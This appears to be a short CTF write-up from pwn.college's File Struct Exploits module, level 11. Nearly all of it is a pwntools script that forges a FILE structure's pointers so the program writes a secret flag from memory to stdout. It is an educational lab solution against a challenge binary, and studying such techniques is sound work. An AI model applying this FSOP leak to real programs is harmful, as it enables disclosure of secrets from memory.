Post

(File Struct Exploits) level 11

Posted
By hackeringtrue
1 min read
(File Struct Exploits) level 11

Information

  • category: pwn

Description

Apply FILE struct exploits to leak a secret value.

Explit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

from pwn import *

elf = context.binary = ELF("/challenge/babyfile_level11")
global p
p = elf.process()

def new_note(size):
    p.sendlineafter(b"> ",b"new_note")
    p.send(size)

def del_note():
    p.sendlineafter(b"> ",b"del_note")

def write_note(data):
    p.sendlineafter(b"> ",b"write_note")
    p.send(data)

def read_note():
    p.sendlineafter(b"> ",b"read_note")

def open_file():
    p.sendlineafter(b"> ",b"open_file")

def close_file():
    p.sendlineafter(b"> ",b"close_file")

def write_file():
    p.sendlineafter(b"> ",b"write_file")

def write_fp(data):
    p.sendlineafter(b"> ",b"write_fp")
    p.send(data)

def quit():
    p.sendlineafter(b"quit")

def exploit():
    p.recvuntil(b"located at ")
    flag = int(p.recvline()[:-1],16)

    new_note(b"50")
    write_note(b"AAAA")
    read_note()

    open_file()
    
    fp = FileStructure() 
    fp.flags = 0x800
    fp._IO_read_end = flag
    fp._IO_write_base = flag
    fp._IO_write_ptr = flag + 0x64
    fp.fileno = 1

    write_fp(bytes(fp.struntil("_flags2"))) # or just fp.write(flag,100)
    write_file()

    p.interactive()

def main():
    exploit()

if __name__ == "__main__":
    main()
pwn.college, File-Struct-Exploits
pwn.college FSOP fp-overwrite
This post is licensed under CC BY 4.0 by the author.